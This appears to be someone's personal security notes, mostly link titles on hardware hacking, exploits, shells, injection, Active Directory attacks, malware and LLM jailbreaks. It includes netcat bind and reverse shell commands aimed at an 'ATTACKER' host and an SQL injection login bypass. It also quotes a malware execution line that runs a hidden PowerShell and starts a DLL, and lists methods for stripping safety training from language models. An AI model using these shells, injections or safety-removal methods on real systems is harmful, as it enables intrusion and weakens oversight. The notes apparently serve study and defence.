Unleashing the power of the Flipper Zero with custom firmware - YouTube
DarkFlippers/unleashed-firmware: Flipper Zero Unleashed Firmware

WiFi Dev Board

Flipper Zero: The Ultimate WI-FI Guide | Marauder ESP32 - YouTube
Flipper Zero: How To Run Marauder on the WiFi Dev Board - YouTube

Cars

Flipper Zero vs Cars, Bike locks, Alarm systems and Door chimes 😱 - YouTube

Warning! This is how cars are hacked. Just like in Mr Robot. - YouTube

jimilinuxguy/Tesla-Charging-Port-Opener: Files for HackRF + Portapack MAYHEM firmware to open any and all Tesla vehicle charging ports in range!

Rubber Ducky

ATMega32U4 can be used as a USB HID device

BadUSB - Wikiwand
Hak5 - USB Rubber Ducky - YouTube

Do NOT Plug This USB In! – Hak5 Rubber Ducky - YouTube
Introducing the NEW 🐤 USB Rubber Ducky - YouTube

What Is BadUSB? Definition and How To Prevent It | NinjaOne

bad USBs are SCARY!! (build one with a Raspberry Pi Pico for $8) - YouTube
dbisu/pico-ducky: Create a USB Rubber Ducky like device using a Raspberry PI Pico
SourasishBasu/PicoW-Ducky: Using Raspberry Pi Pico W as a Rubber Ducky to inject and execute payload scripts on a system
Upgrade The Cheapest USB Rubber Ducky with Raspberry Pi Pico + CircuitPython | by Febi Mudiyanto | Medium

cecio/USBvalve: Expose USB activity on the fly
USBvalve: Expose USB Activity On The Fly by Cesare Pizzi - YouTube

HackRF

Welcome to HackRF’s documentation! — HackRF documentation
It’s TOO Easy to Accidentally Do Illegal Stuff with This - YouTube

hackrf · GitHub Topics · GitHub
dressel/pyhackrf: A Python wrapper for libhackrf

pothosware/SoapySDR: Vendor and platform neutral SDR support library.
Home · pothosware/SoapySDR Wiki · GitHub

ICE9 Blog
mikeryan/ice9-bluetooth-sniffer: Wireshark-compatible all-channel BLE sniffer for bladeRF, with wideband Bluetooth sniffing for HackRF and USRP
Bluetooth Hacking: Tools And Techniques | Mike Ryan [@mpeg4codec] - Media Center | hardwear.io

Software Defined Radio with HackRF - Great Scott Gadgets

HackRF One - Great Scott Gadgets

Proxmark3

Proxmark3 Easy (Iceman Firmware) - RFID & NFC Chip Implants and Biohacking products

Getting started with the proxmark3 easy - DT Info - Dangerous Things Forum
RfidResearchGroup/proxmark3: Iceman Fork - Proxmark3

Binary Analysis/Malware Analysis/Reverse Engineering

reverse-engineering

Prover

math#Prover


Attacks/Vulnerabilities

Vulnerabilities and Exploits — ENISA
Zero-Day — ENISA

Low Level Learning
Eghad! Hackers! - YouTube

Exploiting V8 at openECSC Ʊ lyra's epic blog

Home | 离别歌 PHITHON
Home - "Code Audit" Knowledge Planet (知识星球)

Paper
PHITHON's public vulnerabilities
Paper - Phith0n

Why the Traditional Security Operations Model Fails and How To Fix It
Open-Source Malware vs. Vulnerable Components: Knowing the Difference Matters
Linux Malware: What To Know About the Malware Threat
Linux Kernel Exploits: Common Threats and How To Prevent Them

Vulnerability Database

Vulnerability Databases: Is China's CNNVD Superior to the US NVD?

CWE - Common Weakness Enumeration
Home | CVE
NVD - Home

OWASP Top Ten | OWASP Foundation
OWASP Top 10

Connected-Vehicle Product Security Vulnerability Database (CSVD)

Google Hacking Database (GHDB) - Google Dorks, OSINT, Recon

Exploit Database - Exploits for Penetration Testers, Researchers, and Ethical Hackers
Exploit-DB / Exploits + Shellcode + GHDB · GitLab
Exploit Database SearchSploit Manual

jfoote/exploitable: The 'exploitable' GDB plugin

Vulnerable Environments/Target Machines

OWASP Vulnerable Web Applications Directory | OWASP Foundation
vavkamil/awesome-vulnerable-apps: Awesome Vulnerable Applications

vulnerable-apps
vulnerable-apps/awesome-vulnerable: A curated list of VULNERABLE APPS and SYSTEMS which can be used as PENETRATION TESTING PRACTICE LAB.
vulnerable-apps/Vulnerable-JWT: Collection of vulnerable APIs/apps to test JWT attacks
vulnerable-apps/vuln_node_express

trailofbits/not-going-anywhere: A set of vulnerable Golang programs
trailofbits/not-slithering-anywhere: The Python Version of our Not Go-ing Anywhere Vulnerable Application

Download Metasploitable - Virtual Machine to Test Metasploit
rapid7/metasploitable3: Metasploitable3 is a VM that is built from the ground up with a large amount of security vulnerabilities.

Vulhub - Docker-Compose file for vulnerability environment
vulhub/vulhub: Pre-Built Vulnerable Environments Based on Docker-Compose

cider-security-research/cicd-goat: A deliberately vulnerable CI/CD environment. Learn CI/CD security through multiple challenges.

zhuifengshaonianhanlu/pikachu: A fun web security vulnerability testing platform

Generative AI

AI and Cybersecurity: The Dual Role of Automation in Threat Mitigation and Attack Facilitation
Fortifying Your Organization Against AI-Driven Injection Attacks

Now Scammers Are Sending Bank-Draining Malware Through Snail Mail: Here's How

Countdown to GovWare 2023 - The Application of Artificial Intelligence (AI) in Cybersecurity - NSFOCUS, Inc., a global network and cyber security leader, protects enterprises and carriers from advanced cyber attacks.

CyberNative/CyberBase-13b · Hugging Face

Jailbreak

Universal and Transferable Attacks on Aligned Language Models
[2307.15043] Universal and Transferable Adversarial Attacks on Aligned Language Models
llm-attacks/llm-attacks: Universal and Transferable Attacks on Aligned Language Models

Aligning language models to follow instructions | OpenAI
[2204.05862] Training a Helpful and Harmless Assistant with Reinforcement Learning from Human Feedback

[2406.11717] Refusal in Language Models Is Mediated by a Single Direction
Refusal in LLMs is mediated by a single direction — LessWrong

[2310.20624] LoRA Fine-tuning Efficiently Undoes Safety Training in Llama 2-Chat 70B

Maxime Labonne - Uncensor any LLM with abliteration

CyberPal.AI

[2408.09304v1] CyberPal.AI: Empowering LLMs with Expert-Driven Cybersecurity Instructions

CyberSecEval

[2404.13161v1] CyberSecEval 2: A Wide-Ranging Cybersecurity Evaluation Suite for Large Language Models
CYBERSECEVAL 3: Advancing the Evaluation of Cybersecurity Risks and Capabilities in Large Language Models | Research - AI at Meta

CyberSecEval 3 | CyberSecEval 3
PurpleLlama/CybersecurityBenchmarks at main · meta-llama/PurpleLlama ❗!important
meta-llama/PurpleLlama: Set of tools to assess and improve LLM security.

Project Naptime

Code scanning to discover vulnerabilities

Project Zero: Project Naptime: Evaluating Offensive Security Capabilities of Large Language Models
Project Zero: From Naptime to Big Sleep: Using Large Language Models To Catch Vulnerabilities In Real-World Code

Smart Contracts

Introduction - Building Secure Contracts
crytic/building-secure-contracts: Guidelines and training material to write secure smart contracts
crytic/awesome-ethereum-security: A curated list of awesome Ethereum security references

Buffer Overflow

reverse-engineering#debugging

Buffer overflow - Wikiwand
Stack buffer overflow - Wikiwand
Heap overflow - Wikiwand
NOP slide - Wikiwand
Return-to-libc attack - Wikiwand

w00w00 on Heap Overflows - Wayback Machine
Linux Kernel Module (LKM) Hacking - Wayback Machine
Console IOCTLs Under Linux - Wayback Machine

Writing buffer overflow exploits - a tutorial for beginners

Stack buffer overflow

Mastering Buffer Overflow Exploits: A Complete Guide for CTF and Penetration Testing! - YouTube
Running a Buffer Overflow Attack - Computerphile - YouTube
how do hackers exploit buffers that are too small? - YouTube
HACKED! How a Buffer Overflow Exploit works, plus Code Red! - YouTube
BASIC Buffer Overflow | Ryan's CTF [13] Everyday I'm Bufferin - YouTube

Gallopsled/pwntools: CTF framework and exploit development library Python script to control and automate GDB, use GEF to lookup return address

John Hammond
Pwntools & GDB for Buffer Overflow w/ Arguments (PicoCTF 2022 #43 'buffer-overflow2') - YouTube
DANGEROUS C Functions gets & strcpy (PicoCTF 2022 #04 buffer-overflow0) - YouTube
TryHackMe! Buffer Overflow & Penetration Testing - YouTube complete flow for attack

PWN 101 - Buffer Overflow [Cantonese CTF beginner tutorial] - YouTube pwntools

Buffer Overflow Attack — Exploit Stack Based Buffer Overflow | by Dheeraj Deshmukh | System Weakness
Buffer Overflow Attack ( Part - II)— Mona Script | by Dheeraj Deshmukh | Medium

Return-Oriented Programming (ROP)

Return-oriented programming - Wikiwand

What is ROP - CTF Handbook
ROP Chaining: Return Oriented Programming | Red Team Notes
Return-Oriented Programming (ROP) Chain | by Imène ALLOUCHE | Medium

0vercl0k/rp: rp++ is a fast C++ ROP gadget finder for PE/ELF/Mach-O x86/x64/ARM/ARM64 binaries.

JonathanSalwan/ROPgadget: This tool lets you search your gadgets on your binaries to facilitate your ROP exploitation. ROPgadget supports ELF, PE and Mach-O format on x86, x64, ARM, ARM64, PowerPC, SPARC, MIPS, RISC-V 64, and RISC-V Compressed architectures.
Taking the Next Step: From Buffer Overflow Exploits to ROP Programming | LinkedIn

Process Injection

Defense Evasion (hides process execution), Privilege Escalation

Code & Process Injection - Red Team Notes
CreateRemoteThread Shellcode Injection - Red Team Notes
sample of shellcode injection into a process (Gray Hat Python)

How to Hook Win32 API With Kernel Patching
Process Introspection for Fun and Profit

sh4hin/GoPurple: Yet another shellcode runner consists of different techniques for evaluating detection capabilities of endpoint security solutions

ELFun File Injector - Malware - 0x00sec - The Home of the Hacker
User Mode Rootkits: IAT and Inline Hooking - Malware - 0x00sec - The Home of the Hacker
Process Injection: APC Injection - Malware - 0x00sec - The Home of the Hacker
Process Injection: Remote Thread Injection or CreateRemoteThread | Alion’s Blog
On Windows Syscall Mechanism and Syscall Numbers Extraction Methods

Docker Security: Docker Breakouts : Process Injection - YouTube
[Linux] Infecting Running Processes - Programming - 0x00sec - The Home of the Hacker
Programming for Wannabees. Part III. Your first Shell Code - Programming - 0x00sec - The Home of the Hacker
Linux Shellcoding (Part 1.0) - Exploit Development - 0x00sec - The Home of the Hacker

Back From the Grave: ELF32 Universal Command Injector
Dynamically Inject a Shared Library Into a Running Process on Android/ARM

Living off the land

Living off the land: using tools already present on the victim machine

How to Proxy Command Execution: "Living Off The Land" Hacks - YouTube
andrew-d/static-binaries: Various *nix tools built as statically-linked binaries

GTFOBins Linux
LOLBAS Windows, Living Off The Land Binaries, Scripts and Libraries, for Windows

DDExec

arget13/DDexec: A technique to run binaries filelessly and stealthily on Linux by "overwriting" the shell's process with another.
Run ANY Linux Program In Memory - YouTube

Cronjob

Using crontab and command injection privilege escalation | VK9 Security
Cron Jobs – Linux Privilege Escalation - Juggernaut-Sec

Remote Code Execution

reverse

The gist is that:

Cheating at video games - YouTube
Don’t try to sanitize input. Escape output.

Bind/Remote/Reverse shell

Bind shell: attacker connects to victim
Remote (reverse) shell: victim connects to attacker

Reverse Shell Cheat Sheet | pentestmonkey
Reverse Shell Cheat Sheet - Internal All The Things
Detect reverse shells from multiple dimensions - Security Center - Alibaba Cloud Documentation Center

tennc/webshell: This is a webshell open source project
pureqh/webshell: AV-evasion webshell generator

Difference Between Bind Shell and Reverse Shell - GeeksforGeeks
Bind Shell and Reverse Shell | Puck's Blog
hackerschoice/thc-tips-tricks-hacks-cheat-sheet: Various tips & tricks

What Is a Web Shell & How Do I Dissect It?

Easy way to Generate Reverse Shell - Hacking Articles

Remote Shells. Part I - Networking - 0x00sec - The Home of the Hacker
Remote Shells. Part II. Crypt your link - Networking - 0x00sec - The Home of the Hacker
Remote Shells Part III. Shell Access your Phone - Networking - 0x00sec - The Home of the Hacker

Online - Reverse Shell Generator
My Pentest Tools
how to get remote access to your hacking targets // reverse shells with netcat (Windows and Linux!!) - YouTube

# Bind shell
# [victim] listen, forward input to `sh`
nc -lvnp 5555 -e sh
# [attacker]
nc VICTIM 5555

# Remote shell
# [attacker]
nc -lvnp 5555
# [victim] connect back, forward input to `sh`
nc ATTACKER 5555 -e sh

t3l3machus/hoaxshell: A Windows reverse shell payload generator and handler that abuses the http(s) protocol to establish a beacon-like reverse shell.

pwncat - reverse shell handler with all netcat features
cytopia/pwncat: pwncat - netcat on steroids with Firewall, IDS/IPS evasion, bind and reverse shell, self-injecting shell and port forwarding magic - and its fully scriptable with Python (PSE)
A Detailed Guide on Pwncat - Hacking Articles

calebstewart/pwncat: Fancy reverse and bind shell handler
pwncat documentation

SQL injection

Simple injection on username field: ANYNAME' OR 1=1 --

SQL injection - Wikiwand
SQL injection techniques - Getting started with SQL injection - YouTube
Step-by-step SQL injection guide to bypassing basic login screen - Mastering SQL injection - YouTube
What is SQL Injection? Tutorial & Examples | Web Security Academy
Web Security Academy - SQL Injection (Long Version) - YouTube

SQL Injection | OWASP Foundation
Blind SQL Injection | OWASP Foundation
SQL Injection Prevention - OWASP Cheat Sheet Series

7 essential SQL Server security tips | InfoWorld
bobby-tables.com: A guide to preventing SQL injection in {currlang}

SQL INJECTION — The Coolest Vulnerability | by Dheeraj Deshmukh | Medium
Preventing SQL Injection Attacks With Python – Real Python

sqlmap: automatic SQL injection and database takeover tool
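Sqlmap usage explained in detail - 安全客 (Anquanke) - security news platform
SQL injection vulnerabilities explained in detail - 安全客 (Anquanke) - security news platform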

sqlninja - a SQL Server injection & takeover tool

NoSQL injection

NoSQL Injection attack | Tutorials & Examples | Snyk Learn
NoSQL injection | Web Security Academy
NoSQL injection - HackTricks

WSTG - Latest | OWASP Foundation
SQL Injection in MongoDB: Examples and Prevention

node.js - Mitigating MongoDB injection attacks with Mongoose - Stack Overflow
How does MongoDB avoid the SQL injection mess? - Stack Overflow

JavaScript Prototype Poisoning

What is prototype pollution? | Tutorial & examples | Snyk Learn
Prototype-Poisoning | Fastify
JavaScript Prototype Poisoning Vulnerabilities in the Wild | by Bryan English ☜ | intrinsic | Medium

Hacking Kerberos

web-authentication#Active Directory

Learn Active Directory Kerberoasting - YouTube

get hash and crack offline
ParrotSec/mimikatz
GhostPack/Rubeus: Trying to tame the three-headed dog.
BloodHoundAD/BloodHound: Six Degrees of Domain Admin
CrackMapExec, using PSExec
Password Spray
invoke phantom disables Event Logs
DCSync, DCShadow
NTLM hash* (Pass The Hash attack), LM hash
Generate an NTLM Hash - NTLM Password - Online - Browserling Web Developer Tools

enterprise admin, KRBTGT ticket (Kerberoast), skeleton key, password access key, DSRM
domain admin
local admin

/do (short for /domain): run the query against the domain controller

ipconfig /all
nslookup NAME /ip
net accounts /do
net user USER /do
net localgroup administrators
net localgroup administrators /do
net group HQ_Desktop_admin /do
nltest /dclist:astri.local
nltest /server:ASPDC02 /domain_trusts

PHP

Overview of bare-file local file inclusion in Docker PHP | 离别歌 pearcmd.php RCE
Website Vulnerabilities to Fully Hacked Server - YouTube

Impact

Fork bomb

Understanding Fork Bombs in 5 Minutes or Less - YouTube
these characters will crash your computer - YouTube

DoS/DDoS

Denial-of-service attack - Wikiwand
SYN flood - Wikiwand
How to Prevent DDoS Attacks: 7 Tried-and-Tested Methods
How to Stop a DDoS Attack: 4 Steps to Take Now
How to Stop DDoS Attacks: 6 Tips for Fighting DDoS Attacks

Best Practices: DDoS preventative measures – Cloudflare Help Center
Cloudflare thwarts 17.2M rps DDoS attack — the largest ever reported
Identifying and Mitigating DDoS Attacks

LOIC download | SourceForge.net
Low Orbit Ion Cannon - Wikiwand
What is LOIC - Low Orbit Ion Cannon | DDoS Tools | Imperva

Slowloris (computer security) - Wikiwand
Slowloris HTTP DoS
gkbrk/slowloris: Low bandwidth DoS tool. Slowloris rewrite in Python.

Timing attacks

A Lesson In Timing Attacks (or, Don’t use MessageDigest.isEquals) | codahale.com

The time difference in a non-constant-time array comparison can be used to brute-force the digest byte by byte.

Heartbleed

Heartbleed Bug
Heartbleed - Wikiwand
Heartbleed – Andrew Kennedy

xkcd: Heartbleed Explanation
Heartbleed Report (2017-01) - Shodan

How I used Heartbleed to steal a site’s private crypto key – Ars Technica
Critical crypto bug exposes Yahoo Mail, other passwords Russian roulette-style | Ars Technica
Coder in a World of Code: My Heart Bleeds for OpenSSL

Shellshock

Shellshock (software bug) - Wikiwand

The Shellshock Bug In About Four Minutes - YouTube
Shellshock DIY – Andrew Kennedy
Troy Hunt: Everything you need to know about the Shellshock Bash bug
How to Protect Your Server Against the Shellshock Bash Vulnerability | DigitalOcean
Shellshock DHCP RCE Proof of Concept - TrustedSec - Information Security

Ransomware

Cyber Extortion vs. Ransomware: What's the Difference?
Linux Ransomware Threats: How Attackers Target Linux Systems DarkRadiation, RansomEXX
How Do We Build Ransomware Resilience Beyond Just Backups?

BREACH

BREACH ATTACK
BREACH (security exploit) - Wikiwand

Stuxnet

Stuxnet - Wikiwand
Stuxnet explained: The first known cyberweapon | CSO Online
Stuxnet: a 3-Parts Series | Curious Minds - Curious Minds Podcast
Stuxnet: Advanced Persistent Threat - Ran Levi
The Most Sophisticated Malware Ever Made (That We Know Of)🎙Darknet Diaries Ep. 29: Stuxnet - YouTube

Memory Address Scanning

Undermining Information Hiding (And What to do About it)

Row Hammering/Drammer/RAMpage

Row hammer - Wikiwand

Physical RAM attack can root Android and possibly other devices | InfoWorld
Google researchers hack computers using DRAM electrical leaks | Computerworld
Researchers develop astonishing Web-based attack on a computer's DRAM | Computerworld
Drammer: Deterministic Rowhammer Attacks on Mobile Platforms PDF
New Drammer Android Hack lets Apps take Full control (root) of your Phone
vusec/drammer: Native binary for testing Android phones for the Rowhammer bug

RAMPAGE AND GUARDION
Every Android Device Since 2012 Impacted by RAMpage Vulnerability

Dirty COW

Dirty COW (CVE-2016-5195)
Dirty COW - Wikiwand

RegreSSHion

OpenSSH 'RegreSSHion' RCE Vulnerability
xonoxitron/regreSSHion: CVE-2024-6387 (regreSSHion) Exploit (PoC), a vulnerability in OpenSSH's server (sshd) on glibc-based Linux systems.
xonoxitron/regreSSHion-checker: Quickly identifies servers vulnerable to OpenSSH 'regreSSHion' (CVE-2024-6387).

Meltdown and Spectre

Two major computer processor security bugs, dubbed Meltdown and Spectre, affect nearly every device made in the last 20 years.

What Is Speculative Execution? - ExtremeTech

Meltdown and Spectre
Spectre & Meltdown - Computerphile - YouTube
Meltdown: the latest news on two major CPU security bugs - The Verge
Meltdown, Spectre: The password theft bugs at the heart of Intel CPUs • The Register

What are the Meltdown and Spectre exploits? | Network World
New Spectre derivative bug haunts Intel processors | Network World
Microsoft, Google: We've found a fourth data-leaking Meltdown-Spectre CPU hole • The Register

Spectre/Meltdown/L1TF/MDS Mitigation Costs On An Intel Dual Core + HT Laptop - Phoronix
The Performance Impact Of MDS / Zombieload Plus The Overall Cost Now Of Spectre/Meltdown/L1TF/MDS - Phoronix

speed47/spectre-meltdown-checker: Spectre & Meltdown vulnerability/mitigation checker for Linux
IAIK/meltdown: This repository contains several applications, demonstrating the Meltdown bug.

MDS/ZombieLoad

MDS Attacks: Microarchitectural Data Sampling
ZombieLoad Attack

Microarchitectural Data Sampling (aka MDS, ZombieLoad, RIDL & Fallout) explained by Red Hat - YouTube
Buffer the Intel flayer: Chipzilla, Microsoft, Linux world, etc emit fixes for yet more data-leaking processor flaws • The Register
Intel CPUs impacted by new Zombieload side-channel attack | ZDNet

Intel Side Channel Vulnerability MDS
Deep Dive: Intel Analysis of Microarchitectural Data Sampling

RIP Hyper-Threading? ChromeOS axes key Intel CPU feature over data-leak flaws – Microsoft, Apple suggest snub • The Register

Intel CPUs can be exploited unless you disable hyper-threading, Linux dev claims | TechRadar


Static Analysis/Source Code Analysis

"Source code security audit speed run" - Eldar Marcussen - YouTube

Awesome Rank for mre/awesome-static-analysis
analysis-tools-dev/static-analysis: ⚙️ A curated list of static analysis (SAST) tools for all programming languages, config files, build tools, and more. The focus is on tools which improve code quality.
Source Code Analysis Tools | OWASP Foundation

How to Analyze Code for Vulnerabilities - YouTube
Is this okay!? How to review code for security issues - Rouan Wilsenach - NDC Security 2023 - YouTube

Mobile Security Framework · GitHub

Snyk Open Source Advisor | Snyk

Semgrep — Find bugs and enforce code standards
Explore | Semgrep
trailofbits/semgrep-rules: Semgrep queries developed by Trail of Bits.

ShiftLeft Inc. webgoat and tarpit
ShiftLeftSecurity/tarpit-java
ShiftLeftSecurity/tarpit-nodejs
ShiftLeftSecurity/tarpit-python
ShiftLeftSecurity/flask-webgoat

Many provide free service for open source projects

Codecov - Code Coverage
Coveralls - Test Coverage History & Statistics
Code Climate. Hosted static analysis for Ruby, PHP and JavaScript source code.
Dependency management + Code analytics for Node.js projects
Codacy | The fastest static analysis tool from setup to first analysis | Codacy
Code Quality and Code Security | SonarQube

Snyk | Developer Security | Develop Fast. Stay Secure.
snyk - npm

npm install -g snyk
cd your-app
snyk test
snyk wizard

chrisallenlane/drek: A static-code-analysis tool for performing security-focused code reviews. It enables an auditor to swiftly map the attack-surface of a large application, with an emphasis on identifying development anti-patterns and footguns. glorified grep
Source Code Auditing - YouTube

wireghoul/graudit: grep rough audit - source code auditing tool

Powering up your source code auditing with parsers - YouTube Lazy Bloodhound, build on tree-sitter, for PHP

pip-audit
npm audit

Malware

MalwareTech
Malwarebytes Labs - The Security Blog From Malwarebytes | Malwarebytes Labs

Maldev Academy

Cheat-Sheets — Malware Archaeology logs generated by malware

How Hackers Use netsh.exe For Persistence & Code Execution (Sliver C2) - YouTube
Modern Malware Is Stealthier Than Older Attacks: This Is How It Stays Hidden

The Art Of Malware - Bringing the dead back to life - Malware - 0x00sec - The Home of the Hacker old malware
Analyzing Modern Malware Techniques - Part 1 - Malware - 0x00sec - The Home of the Hacker
Analyzing Modern Malware Techniques - Part 2 - Malware - 0x00sec - The Home of the Hacker
Analyzing Modern Malware Techniques - Part 3 - Malware - 0x00sec - The Home of the Hacker
Analyzing Modern Malware Techniques - Part 4 - Malware - 0x00sec - The Home of the Hacker

Database/Repo

NVD - Home
URLhaus | Browse
Malpedia (Fraunhofer FKIE)

Windows malware execution

Hackers Have a New Strategy - How to Defend Against It - YouTube
Flight of the Bumblebee: Email Lures and File Sharing Services Lead to Malware

C:\Windows\System32\cmd.exe /c powershell -WindowStyle Hidden -Command ".\7za.exe x archive.7z -pFhu$$57csa -o\"c:\programdata\" -y > $null; rundll32 c:\programdata\19a.dll,oxgdXPSGPw

Obfuscation/Evasion

John Hammond
How Hackers & Malware Spoof Processes - YouTube
How Hackers Write Malware & Evade Antivirus (Nim) - YouTube
How Does Malware Know It's Being Monitored? - YouTube

IoT Malware

IoT Malware Droppers (Mirai and Hajime) - Malware - 0x00sec - The Home of the Hacker
jgamblin/Mirai-Source-Code: Leaked Mirai Source Code for Research/IoC Development Purposes

CUPS vulnerability

Attacking UNIX Systems via CUPS, Part I
we need to talk about the new Linux exploit (9.9 CVSS) - YouTube

Fileless Malware

The Malware That Must Not Be Named: Suspected Espionage Campaign Delivers “Voldemort” | Proofpoint US

PS4 Jailbreak

TheOfficialFloW/PPPwn: PPPwn - PlayStation 4 PPPoE RCE
the new PS4 jailbreak is sort of hilarious - YouTube